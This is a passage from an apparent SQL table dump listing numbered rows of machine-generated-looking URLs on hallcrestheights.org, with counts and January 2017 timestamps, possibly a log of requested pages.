00:00:00'),(3544,'http://www.hallcrestheights.org/zmkuedtz-jivyo-i20162636-k25880-qxifgxuh-xptvuhm-iwnz-korpv.htm',NULL,'','',1,0,'2017-01-09 03:01:14','0000-00-00 00:00:00'),(3545,'http://www.hallcrestheights.org/upttmnbe-atgrb-k14720-nqcdcncx-rdhcpgz-i20162632-zdll-imvyx.htm',NULL,'','',1,0,'2017-01-09 03:03:12','0000-00-00 00:00:00'),(3546,'http://www.hallcrestheights.org/vqjnyspv-holjp-i20162636-k46580-eurrtpil-uourxiv-lbtr-hnnmt.htm',NULL,'','',1,0,'2017-01-09 03:05:07','0000-00-00 00:00:00'),(3547,'http://www.hallcrestheights.org/dvis-ciwbvwk-i20162630-k12632-uxkrb-zomsmv-uclzuph-vqawuoxz.htm',NULL,'','',1,0,'2017-01-09 03:07:03','0000-00-00 00:00:00'),(3548,'http://www.hallcrestheights.org/nfrkop-k59689-dobbumgo-lzes-rkwtz-i20162632-qtqb-svjcwjb-xnmyvss-sldjz-naahjb/',NULL,'','',1,0,'2017-01-09 03:08:59','0000-00-00 00:00:00'),(3549,'http://www.hallcrestheights.org/i20162634-jgle-tkymdrq-k41612-znrvm-lkswaz-vkecqqn-eeiaqjzl.htm',NULL,'','',1,0,'2017-01-09 03:12:51','0000-00-00 00:00:00'),(3550,'http://www.hallcrestheights.org/vqjnyspv-holjp-k37220-eurrtpil-uourxiv-i20162632-lbtr-hnnmt.htm',NULL,'','',1,0,'2017-01-09 03:14:48','0000-00-00 00:00:00'),(3551,'http://www.hallcrestheights.org/i20162628-edzv-dlqcomn-k58892-nmmca-wvbfuj-apyvrlf-lxhqjkuh.htm',NULL,'','',1,0,'2017-01-09 03:18:39','0000-00-00 00:00:00'),(3552,'http://www.hallcrestheights.org/edzvd-i20162633-lqco-k184-mnnm-mcawvbfu-japyvrlf-lxhqjk-uhkcm.htm',NULL,'','',1,0,'2017-01-09 03:22:31','0000-00-00 00:00:00'),(3553,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm-vuclzup/hvqa-wuoxz-mnpzvs-k5430-gcrl-ycmczoqq-eludpwcm-i20162636-egiapx.htm',NULL,'','',1,0,'2017-01-09 03:23:35','0000-00-00 00:00:00'),(3554,'http://www.hallcrestheights.org/tkuyk-k32257-fjdnjj-bucyu-paja-ylrlwfv-dyruqpkl-i20162634-sdefhxdf-pdfufpf-ajnpvzat/',NULL,'','',1,0,'2017-01-09 03:24:26','0000-00-00 00:00:00'),(3555,'http://www.hallcrestheights.org/edzvd-lqco-k184-mnnm-mcawvbfu-japyvrlf-i20162637-lxhqjk-uhkcm.htm',NULL,'','',1,0,'2017-01-09 03:26:24','0000-00-00 00:00:00'),(3556,'http://www.hallcrestheights.org/k1876-upttmn-beatgr-bnqcdc-i20162628-ncxr-dhcpgz-zdllim-vyxjl.htm',NULL,'','',1,0,'2017-01-09 03:28:23','0000-00-00 00:00:00'),(3557,'http://www.hallcrestheights.org/zmkued-tzjivy-i20162634-oqxifg-xuhx-ptvuhm-k41116-iwnzko-rpvub.htm',NULL,'','',1,0,'2017-01-09 03:30:16','0000-00-00 00:00:00'),(3558,'http://www.hallcrestheights.org/vqjnys-pvholj-i20162634-peurrt-pilu-ourxiv-lbtrhn-k61816-nmtqz.htm',NULL,'','',1,0,'2017-01-09 03:34:10','0000-00-00 00:00:00'),(3559,'http://www.hallcrestheights.org/edzvdl-qcomnn-mmcawv-bfuj-apyvrl-i20162637-flxhqj-k44176-kuhkc.htm',NULL,'','',1,0,'2017-01-09 03:36:04','0000-00-00 00:00:00'),(3560,'http://www.hallcrestheights.org/ixnmue-ahwhio-zhjxbn-wpge-yooayi-i20162637-k23476-kukssz-qceba.htm',NULL,'','',1,0,'2017-01-09 03:38:03','0000-00-00 00:00:00'),(3561,'http://www.hallcrestheights.org/mrcqgb-eifuwg-rabtnw-i20162635-yrqs-k20416-emgwko-whmemx-gkucy.htm',NULL,'','',1,0,'2017-01-09 03:39:58','0000-00-00 00:00:00'),(3562,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-abtnwyrq-i20162635-semgwko-whme-k26500-mxgku-cybnpz.htm',NULL,'','',7,0,'2017-01-09 03:40:25','0000-00-00 00:00:00'),(3563,'http://www.hallcrestheights.org/i20162630-oiyizgo-lrcmw-fbsnop-k57273-dgfnhs-krljr-gfct-fzfiwx-wmakoa-yosmpql-gvegd/',NULL,'','',2,0,'2017-01-09 03:41:51','0000-00-00 00:00:00'),(3564,'http://www.hallcrestheights.org/k11704-upttm-nbea-tgrb-nqcdcncx-i20162636-rdhcpgzz-dllimv-yxjlt.htm',NULL,'','',1,0,'2017-01-09 03:43:48','0000-00-00 00:00:00'),(3565,'http://www.hallcrestheights.org/soeg-szxyife-tvtndyu-uhvfc-yzlsx-k16305-xqroxae-hksk-xyxembuq-udtwq-i20162629-ceyvuc/',NULL,'','',1,0,'2017-01-09 03:45:09','0000-00-00 00:00:00'),(3566,'http://www.hallcrestheights.org/jglet-kymd-k53104-rqzn-rvmlkswa-i20162636-zvkecqqn-eeiaqj-zlnpl.htm',NULL,'','',1,0,'2017-01-09 03:45:42','0000-00-00 00:00:00'),(3567,'http://www.hallcrestheights.org/kzpffm-sxklrded/hwge-fvbbg-i20162629-k25999-zagp/',NULL,'','',1,0,'2017-01-09 03:45:49','0000-00-00 00:00:00'),(3568,'http://www.hallcrestheights.org/nfrkop-i20162629-k4699-dobbumgo-lzes-rkwtz/qtqb-svjcwjb-xnmyvss-sldjz-naahjb/',NULL,'','',1,0,'2017-01-09 03:46:30','0000-00-00 00:00:00'),(3569,'http://www.hallcrestheights.org/ryvh-rhmqtyy-i20162634-k10962-sllge/ajanpd-mefnxhq-fhjdyhao-xrcjhwu-vdsvezyt.htm',NULL,'','',1,0,'2017-01-09 03:47:11','0000-00-00 00:00:00'),(3570,'http://www.hallcrestheights.org/i20162632-k21784-dvisc-iwbv-wkux-krbzomsm-vuclzuph-vqawuo-xzmnp.htm',NULL,'','',1,0,'2017-01-09 03:47:39','0000-00-00 00:00:00'),(3571,'http://www.hallcrestheights.org/mrcqgbei-fuwgr/i20162634-k57050-abtnwyrq-semgwko.htm',NULL,'','',1,0,'2017-01-09 03:47:51','0000-00-00 00:00:00'),(3572,'http://www.hallcrestheights.org/yembjv-k26049-htqqdckz-fltz-i20162629-terqb-wnsw-nsnjplp-ftrrjnc-ypjoq-wgzjev-ihsd-pacaylhy/',NULL,'','',1,0,'2017-01-09 03:48:31','0000-00-00 00:00:00'),(3573,'http://www.hallcrestheights.org/edzv-dlqcomn-nmmca/wvbfuj-apyvrlf-i20162630-lxhqjkuh-k22882-kcmumbh.htm',NULL,'','',1,0,'2017-01-09 03:49:13','0000-00-00 00:00:00'),(3574,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-qxifgxuh-i20162636-k41584-xptvuhmi-wnzkor-pvubf.htm',NULL,'','',1,0,'2017-01-09 03:49:35','0000-00-00 00:00:00'),(3575,'http://www.hallcrestheights.org/i20162632-mrcqgbe-ifuwgrab-k52578-tnwyrqse/mgwkowh-memxgk-ucybn-pzkicvej-xkul.htm',NULL,'','',1,0,'2017-01-09 03:49:52','0000-00-00 00:00:00'),(3576,'http://www.hallcrestheights.org/fadla-i20162633-jfnl-k234-gfpc/vwgmyhde-cwxbdeud-kovfii-bptqu-hzxchh.htm',NULL,'','',1,0,'2017-01-09 03:50:32','0000-00-00 00:00:00'),(3577,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-ephi-ijimj-njbo-gtsakbc-i20162632-cgyfmdv-k29289-juxzl-ektsls-hxos-qqjvfyoi/',NULL,'','',1,0,'2017-01-09 03:51:14','0000-00-00 00:00:00'),(3578,'http://www.hallcrestheights.org/k21784-dvisc-iwbv-wkux-krbzomsm-vuclzuph-i20162637-vqawuo-xzmnp.htm',NULL,'','',1,0,'2017-01-09 03:53:27','0000-00-00 00:00:00'),(3579,'http://www.hallcrestheights.org/i20162632-ryvhr-hmqt-yysl-lgeajanp-dmefnxhq-k59764-fhjdyh-aoxrc.htm',NULL,'','',1,0,'2017-01-09 03:55:24','0000-00-00 00:00:00'),(3580,'http://www.hallcrestheights.org/pcscq-k32404-rufu-npkw-xpoideot-i20162636-wtvsoarm-osmgep-lalhe.htm',NULL,'','',1,0,'2017-01-09 03:57:19','0000-00-00 00:00:00'),(3581,'http://www.hallcrestheights.org/mrcqg-i20162633-beif-uwgr-k37264-abtnwyrq-semgwkow-hmemxg-kucyb.htm',NULL,'','',1,0,'2017-01-09 04:01:11','0000-00-00 00:00:00'),(3582,'http://www.hallcrestheights.org/gnfzn-i20162633-xvjx-palt-itjshkyj-yldpijaa-mdurta-k17464-enpgg.htm',NULL,'','',1,0,'2017-01-09 04:03:11','0000-00-00 00:00:00'),(3583,'http://www.hallcrestheights.org/i20162632-fadla-k58864-jfnl-gfpc-vwgmyhde-cwxbdeud-kovfii-bptqu.htm',NULL,'','',1,0,'2017-01-09 04:05:03','0000-00-00 00:00:00'),(3584,'http://www.hallcrestheights.org/fadla-k42484-jfnl-gfpc-vwgmyhde-i20162636-cwxbdeud-kovfii-bptqu.htm',NULL,'','',1,0,'2017-01-09 04:06:59','0000-00-00 00:00:00'),(3585,'http://www.hallcrestheights.org/k112-pcsc-qrufunp-i20162634-kwxpo-ideotw-tvsoarm-osmgepla-lheliyr.htm',NULL,'','',1,0,'2017-01-09 04:08:56','0000-00-00 00:00:00'),(3586,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh-xptvuhm-i20162636-iwnz-k5080-korpv-ubfgnq.htm',NULL,'','',1,0,'2017-01-09 04:10:51','0000-00-00 00:00:00'),(3587,'http://www.hallcrestheights.org/dvisciwb-k18040-vwkux-krbzomsm-i20162628-vuclzup-hvqa-wuoxz-mnpzvs.htm',NULL,'','',1,0,'2017-01-09 04:12:46','0000-00-00 00:00:00'),(3588,'http://www.hallcrestheights.org/k46480-gnfznxvj-xpalt-itjshkyj-yldpija-i20162636-amdu-rtaen-pggwtd.htm',NULL,'','',1,0,'2017-01-09 04:14:43','0000-00-00 00:00:00'),(3589,'http://www.hallcrestheights.org/wbwpbonk-k7341-ydhx-jjikvfv-i20162633-tzpxbxkc-wjybtylw-osdu-ieqg-wsogx-hgpi-sdhtnir/',NULL,'','',1,0,'2017-01-09 04:16:38','0000-00-00 00:00:00'),(3590,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil-uourxiv-i20162636-lbtr-hnnmt-k25780-qzkowt.htm',NULL,'','',1,0,'2017-01-09 04:18:36','0000-00-00 00:00:00'),(3591,'http://www.hallcrestheights.org/k60340-lugdltrs-mxxhy-pzqjllzo-hnjumnt-ecwf-i20162637-ogywb-iwyrur.htm',NULL,'','',1,0,'2017-01-09 04:20:33','0000-00-00 00:00:00'),(3592,'http://www.hallcrestheights.org/pcscqruf-unpkw-xpoideot-wtvsoar-mosm-gepla-i20162631-k49720-lheliy.htm',NULL,'','',1,0,'2017-01-09 04:22:33','0000-00-00 00:00:00'),(3593,'http://www.hallcrestheights.org/zmkuedtz-jivyo-i20162634-qxifgxuh-xptvuhm-iwnz-korpv-k47200-ubfgnq.htm',NULL,'','',1,0,'2017-01-09 04:24:24','0000-00-00 00:00:00'),(3594,'http://www.hallcrestheights.org/kzpffmsx-k8241-klrd-edhwgef-i20162633-vbbgzagp-eciyyuwu-vfzt-jigj-inamz-bcng-tfmlyrg/',NULL,'','',1,0,'2017-01-09 04:26:19','0000-00-00 00:00:00'),(3595,'http://www.hallcrestheights.org/qlbo-i20162629-k18955-wciggec-eayafxr-glnik/ghhmb-bxpgesm-rcai-ztbiauwd-tvixp/',NULL,'','',1,0,'2017-01-09 04:27:42','0000-00-00 00:00:00'),(3596,'http://www.hallcrestheights.org/k51520-vqjnyspv-holjp-eurrtpil-uourxiv-lbtr-hnnmt-i20162631-qzkowt.htm',NULL,'','',1,0,'2017-01-09 04:28:19','0000-00-00 00:00:00'),(3597,'http://www.hallcrestheights.org/fadlaj-fnlgfp-k33826-cvwgmy/hdec-wxbdeu-i20162637-dkovfi-ibptq.htm',NULL,'','',1,0,'2017-01-09 04:28:27','0000-00-00 00:00:00'),(3598,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-snop-dgfnh/skrl-k39099-jrgfctf-zfiwxwm-akoay-osmpql-i20162635-gveg-dfvgcrcb/',NULL,'','',1,0,'2017-01-09 04:29:13','0000-00-00 00:00:00'),(3599,'http://www.hallcrestheights.org/pcscqru-funpkwxp-i20162632-oideotwt-vsoarmo/smgepl-alhel-iyrqiyqf-ufxv-k53178-ugowop-egtq.htm',NULL,'','',1,0,'2017-01-09 04:29:58','0000-00-00 00:00:00'),(3600,'http://www.hallcrestheights.org/soegszxy-k28941-ifet-vtndyuu-i20162633-hvfcyzls-xxqroxae-hksk-xyxe-mbuqu-dtwq-ceyvuci/',NULL,'','',1,0,'2017-01-09 04:30:11','0000-00-00 00:00:00'),(3601,'http://www.hallcrestheights.org/k58795-wbwp-bonkydh/xjjikvf-vtzpx-i20162629-bxkcw/',NULL,'','',1,0,'2017-01-09 04:30:43','0000-00-00 00:00:00'),(3602,'http://www.hallcrestheights.org/i20162632-jgletkym-drqzn-rvmlkswa-zvkecqq-neei-k35320-aqjzl-nplqfc.htm',NULL,'','',1,0,'2017-01-09 04:32:12','0000-00-00 00:00:00'),(3603,'http://www.hallcrestheights.org/i20162632-mrcqgbei-fuwgr-abtnwyrq-k56920-semgwko-whme-mxgku-cybnpz.htm',NULL,'','',1,0,'2017-01-09 04:34:08','0000-00-00 00:00:00'),(3604,'http://www.hallcrestheights.org/i20162632-pcscqruf-unpkw-xpoideot-wtvsoar-k14620-mosm-gepla-lheliy.htm',NULL,'','',2,0,'2017-01-09 04:35:59','0000-00-00 00:00:00'),(3605,'http://www.hallcrestheights.org/i20162632-vqjnyspv-holjp-eurrtpil-uourxiv-lbtr-k16420-hnnmt-qzkowt.htm',NULL,'','',1,0,'2017-01-09 04:37:55','0000-00-00 00:00:00'),(3606,'http://www.hallcrestheights.org/i20162632-gnfznxvj-xpalt-itjshkyj-yldpija-amdu-rtaen-k37120-pggwtd.htm',NULL,'','',1,0,'2017-01-09 04:39:52','0000-00-00 00:00:00'),(3607,'http://www.hallcrestheights.org/edzv-dlqcomn-nmmca-i20162628-wvbfuj-apyvrlf-k38092-lxhqjkuh-kcmumbh.htm',NULL,'','',1,0,'2017-01-09 04:41:47','0000-00-00 00:00:00'),(3608,'http://www.hallcrestheights.org/k63112-zmku-i20162633-edtzjiv-yoqxi-fgxuhx-ptvuhmi-wnzkorpv-ubfgnqt.htm',NULL,'','',1,0,'2017-01-09 04:43:43','0000-00-00 00:00:00'),(3609,'http://www.hallcrestheights.org/ryvh-rhmqtyy-k57892-sllge-i20162628-ajanpd-mefnxhq-fhjdyhao-xrcjhwu.htm',NULL,'','',1,0,'2017-01-09 04:45:38','0000-00-00 00:00:00'),(3610,'http://www.hallcrestheights.org/nfrkopdo-k55581-bbum-golzesr-kwtzqtqb-i20162634-svjcwjbx-nmyv-sssl-djzna-ahjb-kwxrosh/',NULL,'','',1,0,'2017-01-09 04:47:38','0000-00-00 00:00:00'),(3611,'http://www.hallcrestheights.org/ryvh-rhmqtyy-i20162634-k41512-sllge-ajanpd-mefnxhq-fhjdyhao-xrcjhwu.htm',NULL,'','',1,0,'2017-01-09 04:49:30','0000-00-00 00:00:00'),(3612,'http://www.hallcrestheights.org/i20162630-yembjvht-k48201-qqdc-kzfltzt-erqbwnsw-nsnjplpf-trrj-ncyp-joqwg-zjev-ihsdpac/',NULL,'','',1,0,'2017-01-09 04:51:26','0000-00-00 00:00:00'),(3613,'http://www.hallcrestheights.org/jgle-k20812-tkymdrq-i20162634-znrvm-lkswaz-vkecqqn-eeiaqjzl-nplqfcn.htm',NULL,'','',1,0,'2017-01-09 04:53:23','0000-00-00 00:00:00'),(3614,'http://www.hallcrestheights.org/xhajvqlw-k34881-czbi-qsosqxo-qkgqaqyd-i20162634-cptznzvt-jqoe-vpca-qwjal-uwty-bckbsxb/',NULL,'','',1,0,'2017-01-09 04:55:19','0000-00-00 00:00:00'),(3615,'http://www.hallcrestheights.org/pcsc-qrufunp-kwxpo-ideotw-k53932-tvsoarm-i20162630-osmgepla-lheliyr.htm',NULL,'','',1,0,'2017-01-09 04:57:20','0000-00-00 00:00:00'),(3616,'http://www.hallcrestheights.org/uptt-mnbeatg-rbnqc-k33232-dcncxr-dhcpgzz-i20162630-dllimvyx-jltfeob.htm',NULL,'','',1,0,'2017-01-09 04:59:11','0000-00-00 00:00:00'),(3617,'http://www.hallcrestheights.org/jgle-k37192-tkymdrq-znrvm-i20162628-lkswaz-vkecqqn-eeiaqjzl-nplqfcn.htm',NULL,'','',1,0,'2017-01-09 05:01:07','0000-00-00 00:00:00'),(3618,'http://www.hallcrestheights.org/nfrkopdo-i20162631-k62601-bbum-golzesr-kwtzqtqb-svjcwjbx-nmyv-sssl-djzna-ahjb-kwxrosh/',NULL,'','',1,0,'2017-01-09 05:03:03','0000-00-00 00:00:00'),(3619,'http://www.hallcrestheights.org/mrcq-gbeifuw-i20162634-grabt-nwyrqs-emgwkow-hmemxgku-k42412-cybnpzk.htm',NULL,'','',1,0,'2017-01-09 05:04:59','0000-00-00 00:00:00'),(3620,'http://www.hallcrestheights.org/k16492-pcsc-qrufunp-kwxpo-i20162628-ideotw-tvsoarm-osmgepla-lheliyr.htm',NULL,'','',1,0,'2017-01-09 05:06:56','0000-00-00 00:00:00'),(3621,'http://www.hallcrestheights.org/mrcq-gbeifuw-grabt-i20162628-nwyrqs-emgwkow-hmemxgku-k58792-cybnpzk.htm',NULL,'','',1,0,'2017-01-09 05:08:51','0000-00-00 00:00:00'),(3622,'http://www.hallcrestheights.org/pcscq-rufu-npkw-xpoideot-k684-wtvsoarm-i20162637-osmgep-lalhe-liyrqi.htm',NULL,'','',1,0,'2017-01-09 05:10:47','0000-00-00 00:00:00'),(3623,'http://www.hallcrestheights.org/soegszxy-i20162631-k61701-ifet-vtndyuu-hvfcyzls-xxqroxae-hksk-xyxe-mbuqu-dtwq-ceyvuci/',NULL,'','',1,0,'2017-01-09 05:12:43','0000-00-00 00:00:00'),(3624,'http://www.hallcrestheights.org/k1584-ixnmu-eahw-hioz-hjxbnwpg-eyooayik-i20162637-uksszq-cebaq-domytn.htm',NULL,'','',1,0,'2017-01-09 05:14:39','0000-00-00 00:00:00'),(3625,'http://www.hallcrestheights.org/oiyizgo-lrcmw-fbsnop-dgfnhs-krljr-i20162631-gfct-k6573-fzfiwx-wmakoa-yosmpql-gvegd-fvgcr/',NULL,'','',1,0,'2017-01-09 05:16:34','0000-00-00 00:00:00'),(3626,'http://www.hallcrestheights.org/bsoapaz-apsta-sgmhcq-cmckfr-dtfkg-i20162631-pvbc-hsiwho-rklvzr-k5673-tjrsyoa-ayfwg-dxskm/',NULL,'','',1,0,'2017-01-09 05:18:31','0000-00-00 00:00:00'),(3627,'http://www.hallcrestheights.org/lugdlt-rsmxxh-ypzqjl-lzoh-i20162628-k1476-njumnt-ecwfog-ywbiw-yrurfgv.htm',NULL,'','',1,0,'2017-01-09 05:20:27','0000-00-00 00:00:00'),(3628,'http://www.hallcrestheights.org/k2376-zmkued-tzjivy-oqxifg-xuhx-i20162628-ptvuhm-iwnzko-rpvub-fgnqtpm.htm',NULL,'','',1,0,'2017-01-09 05:22:23','0000-00-00 00:00:00'),(3629,'http://www.hallcrestheights.org/jgletk-ymdrqz-nrvmlk-i20162635-swaz-k20916-vkecqq-neeiaq-jzlnp-lqfcneb.htm',NULL,'','',1,0,'2017-01-09 05:24:24','0000-00-00 00:00:00'),(3630,'http://www.hallcrestheights.org/i20162632-mrcqg-beif-uwgr-abtnwyrq-k59364-semgwkow-hmemxg-kucyb-npzkic.htm',NULL,'','',1,0,'2017-01-09 05:26:15','0000-00-00 00:00:00'),(3631,'http://www.hallcrestheights.org/htxwhyk-rsvsv-hudykb-qxdosf-k7473-ietyu-i20162631-aixn-rbdggs-aarhef-skjydmr-ujwim-jqiaa/',NULL,'','',1,0,'2017-01-09 05:28:12','0000-00-00 00:00:00'),(3632,'http://www.hallcrestheights.org/gnfzn-xvjx-palt-itjshkyj-i20162636-k53604-yldpijaa-mdurta-enpgg-wtdvlx.htm',NULL,'','',1,0,'2017-01-09 05:30:08','0000-00-00 00:00:00'),(3633,'http://www.hallcrestheights.org/k61416-upttmn-beatgr-i20162634-bnqcdc-ncxr-dhcpgz-zdllim-vyxjl-tfeobke.htm',NULL,'','',1,0,'2017-01-09 05:32:04','0000-00-00 00:00:00'),(3634,'http://www.hallcrestheights.org/k32904-vqjny-spvh-oljp-eurrtpil-i20162636-uourxivl-btrhnn-mtqzk-owtsxp.htm',NULL,'','',1,0,'2017-01-09 05:33:58','0000-00-00 00:00:00'),(3635,'http://www.hallcrestheights.org/k17064-pcscq-i20162633-rufu-npkw-xpoideot-wtvsoarm-osmgep-lalhe-liyrqi.htm',NULL,'','',1,0,'2017-01-09 05:35:55','0000-00-00 00:00:00'),(3636,'http://www.hallcrestheights.org/htxwhyk-rsvsv-hudykb-qxdosf-i20162630-ietyu-aixn-rbdggs-aarhef-k47253-skjydmr-ujwim-jqiaa/',NULL,'','',1,0,'2017-01-09 05:37:52','0000-00-00 00:00:00'),(3637,'http://www.hallcrestheights.org/gnfzn-i20162633-xvjx-palt-itjshkyj-k16164-yldpijaa-mdurta-enpgg-wtdvlx.htm',NULL,'','',1,0,'2017-01-09 05:39:47','0000-00-00 00:00:00'),(3638,'http://www.hallcrestheights.org/lugdlt-rsmxxh-i20162634-ypzqjl-lzoh-k62316-njumnt-ecwfog-ywbiw-yrurfgv.htm',NULL,'','',1,0,'2017-01-09 05:41:43','0000-00-00 00:00:00'),(3639,'http://www.hallcrestheights.org/cwhriwg-pekzq-dwkvum-zbsaii-i20162630-k56973-mjzfo-zgdv-ddqjvd-obknly-kconedw-jmaxe-vortb/',NULL,'','',1,0,'2017-01-09 05:43:39','0000-00-00 00:00:00'),(3640,'http://www.hallcrestheights.org/i20162632-ryvhr-hmqt-yysl-lgeajanp-k42084-dmefnxhq-fhjdyh-aoxrc-jhwuvd.htm',NULL,'','',2,0,'2017-01-09 05:45:35','0000-00-00 00:00:00'),(3641,'http://www.hallcrestheights.org/pcscqr-ufunpk-wxpoid-eotw-k44676-tvsoar-i20162637-mosmge-plalh-eliyrqi.htm',NULL,'','',1,0,'2017-01-09 05:47:30','0000-00-00 00:00:00'),(3642,'http://www.hallcrestheights.org/ixnmu-eahw-hioz-hjxbnwpg-i20162636-k32004-eyooayik-uksszq-cebaq-domytn.htm',NULL,'','',1,0,'2017-01-09 05:49:27','0000-00-00 00:00:00'),(3643,'http://www.hallcrestheights.org/yembj-vhtqqd-ckzfl-tzte-i20162634-rqbwnsw-nsnjplpf-trrjncyp-k32757-joqwgzj-evihsdpa-caylh/',NULL,'','',1,0,'2017-01-09 05:51:23','0000-00-00 00:00:00'),(3644,'http://www.hallcrestheights.org/jglet-i20162633-kymd-rqzn-rvmlkswa-k37764-zvkecqqn-eeiaqj-zlnpl-qfcneb.htm',NULL,'','',1,0,'2017-01-09 05:53:20','0000-00-00 00:00:00'),(3645,'http://www.hallcrestheights.org/ajqxx-ucuzao-fifep-hiij-i20162634-imjnjbo-gtsakbcc-gyfmdvju-k33657-xzlekts-lshxosqq-jvfyo/',NULL,'','',1,0,'2017-01-09 05:55:15','0000-00-00 00:00:00'),(3646,'http://www.hallcrestheights.org/i20162632-k21384-jglet-kymd-rqzn-rvmlkswa-zvkecqqn-eeiaqj-zlnpl-qfcneb.htm',NULL,'','',2,0,'2017-01-09 05:57:11','0000-00-00 00:00:00'),(3647,'http://www.hallcrestheights.org/qlbow-ciggec-eayaf-xrgl-i20162634-nikghhm-bbxpgesm-rcaiztbi-k53457-auwdtvi-xpmtzhzz-wzrqr/',NULL,'','',1,0,'2017-01-09 05:59:07','0000-00-00 00:00:00'),(3648,'http://www.hallcrestheights.org/i20162632-k58464-ryvhr-hmqt-yysl-lgeajanp-dmefnxhq-fhjdyh-aoxrc-jhwuvd.htm',NULL,'','',1,0,'2017-01-09 06:01:14','0000-00-00 00:00:00'),(3649,'http://www.hallcrestheights.org/vqjnys-pvholj-peurrt-pilu-k23076-ourxiv-i20162637-lbtrhn-nmtqz-kowtsxp.htm',NULL,'','',1,0,'2017-01-09 06:03:00','0000-00-00 00:00:00'),(3650,'http://www.hallcrestheights.org/upttm-nbea-tgrb-nqcdcncx-i20162636-k61884-rdhcpgzz-dllimv-yxjlt-feobke.htm',NULL,'','',1,0,'2017-01-09 06:04:57','0000-00-00 00:00:00'),(3651,'http://www.hallcrestheights.org/yembjvh-tqqdc-kzfltz-terqbw-i20162630-nswns-njpl-pftrrj-ncypjo-qwgzjev-ihsdp-k34473-acayl/',NULL,'','',1,0,'2017-01-09 06:06:52','0000-00-00 00:00:00'),(3652,'http://www.hallcrestheights.org/ixnmu-i20162633-eahw-hioz-hjxbnwpg-k17964-eyooayik-uksszq-cebaq-domytn.htm',NULL,'','',1,0,'2017-01-09 06:08:47','0000-00-00 00:00:00'),(3653,'http://www.hallcrestheights.org/k52704-edzvd-lqco-mnnm-mcawvbfu-i20162636-japyvrlf-lxhqjk-uhkcm-umbhmg.htm',NULL,'','',1,0,'2017-01-09 06:10:46','0000-00-00 00:00:00'),(3654,'http://www.hallcrestheights.org/fadlaj-fnlgfp-i20162634-cvwgmy-hdec-k40716-wxbdeu-dkovfi-ibptq-uhzxchh.htm',NULL,'','',1,0,'2017-01-09 06:12:38','0000-00-00 00:00:00'),(3655,'http://www.hallcrestheights.org/k21384-jglet-kymd-rqzn-rvmlkswa-zvkecqqn-i20162637-eeiaqj-zlnpl-qfcneb.htm',NULL,'','',1,0,'2017-01-09 06:14:35','0000-00-00 00:00:00'),(3656,'http://www.hallcrestheights.org/k11304-lugdl-trsm-xxhy-pzqjllzo-i20162636-hnjumnte-cwfogy-wbiwy-rurfgv.htm',NULL,'','',1,0,'2017-01-09 06:16:31','0000-00-00 00:00:00'),(3657,'http://www.hallcrestheights.org/k43776-gnfznx-vjxpal-titjsh-kyjy-ldpija-i20162637-amdurt-aenpg-gwtdvlx.htm',NULL,'','',1,0,'2017-01-09 06:18:26','0000-00-00 00:00:00'),(3658,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-mcawvbfu-k22284-japyvrlf-i20162637-lxhqjk-uhkcm-umbhmg.htm',NULL,'','',1,0,'2017-01-09 06:20:22','0000-00-00 00:00:00'),(3659,'http://www.hallcrestheights.org/k41184-fadla-jfnl-gfpc-vwgmyhde-i20162636-cwxbdeud-kovfii-bptqu-hzxchh.htm',NULL,'','',1,0,'2017-01-09 06:22:19','0000-00-00 00:00:00'),(3660,'http://www.hallcrestheights.org/wbwpb-onkydh-xjjik-vfvt-zpxbxkc-i20162635-wjybtylw-osduieqg-k12957-wsogxhg-pisdhtni-rmjhv/',NULL,'','',1,0,'2017-01-09 06:24:15','0000-00-00 00:00:00'),(3661,'http://www.hallcrestheights.org/k20016-dvisci-wbvwku-xkrbzo-i20162635-msmv-uclzup-hvqawu-oxzmn-pzvsgcr.htm',NULL,'','',1,0,'2017-01-09 06:26:10','0000-00-00 00:00:00'),(3662,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-lgeajanp-i20162636-k42084-dmefnxhq-fhjdyh-aoxrc-jhwuvd.htm',NULL,'','',1,0,'2017-01-09 06:28:07','0000-00-00 00:00:00'),(3663,'http://www.hallcrestheights.org/k4680-fadlajfn-lgfpc-vwgmyhde-cwxbdeu-i20162636-dkov-fiibp-tquhzx-chhr.htm',NULL,'','',1,0,'2017-01-09 06:32:01','0000-00-00 00:00:00'),(3664,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg-eyooayi-i20162636-k46980-kuks-szqce-baqdom-ytni.htm',NULL,'','',1,0,'2017-01-09 06:33:57','0000-00-00 00:00:00'),(3665,'http://www.hallcrestheights.org/i20162632-upttmnbe-atgrb-nqcdcncx-rdhcpgz-k16020-zdll-imvyx-jltfeo-bkeb.htm',NULL,'','',1,0,'2017-01-09 06:35:52','0000-00-00 00:00:00'),(3666,'http://www.hallcrestheights.org/k51120-upttmnbe-atgrb-nqcdcncx-rdhcpgz-zdll-imvyx-jltfeo-i20162631-bkeb.htm',NULL,'','',1,0,'2017-01-09 06:37:47','0000-00-00 00:00:00'),(3667,'http://www.hallcrestheights.org/i20162632-k34920-edzvdlqc-omnnm-mcawvbfu-japyvrl-flxh-qjkuh-kcmumb-hmgz.htm',NULL,'','',1,0,'2017-01-09 06:43:35','0000-00-00 00:00:00'),(3668,'http://www.hallcrestheights.org/i20162632-k56520-dvisciwb-vwkux-krbzomsm-vuclzup-hvqa-wuoxz-mnpzvs-gcrl.htm',NULL,'','',1,0,'2017-01-09 06:45:33','0000-00-00 00:00:00'),(3669,'http://www.hallcrestheights.org/nfrko-pdobbu-mgolz-esrk-wtzqtqb-i20162635-svjcwjbx-nmyvsssl-k12057-djznaah-jbkwxros-holvg/',NULL,'','',1,0,'2017-01-09 06:47:28','0000-00-00 00:00:00'),(3670,'http://www.hallcrestheights.org/tkuyk-fjdnjj-bucyu-paja-i20162634-ylrlwfv-dyruqpkl-sdefhxdf-k54357-pdfufpf-ajnpvzat-tuxdw/',NULL,'','',1,0,'2017-01-09 06:49:24','0000-00-00 00:00:00'),(3671,'http://www.hallcrestheights.org/upttmnbe-atgrb-nqcdcncx-rdhcpgz-i20162636-k25380-zdll-imvyx-jltfeo-bkeb.htm',NULL,'','',1,0,'2017-01-09 06:51:19','0000-00-00 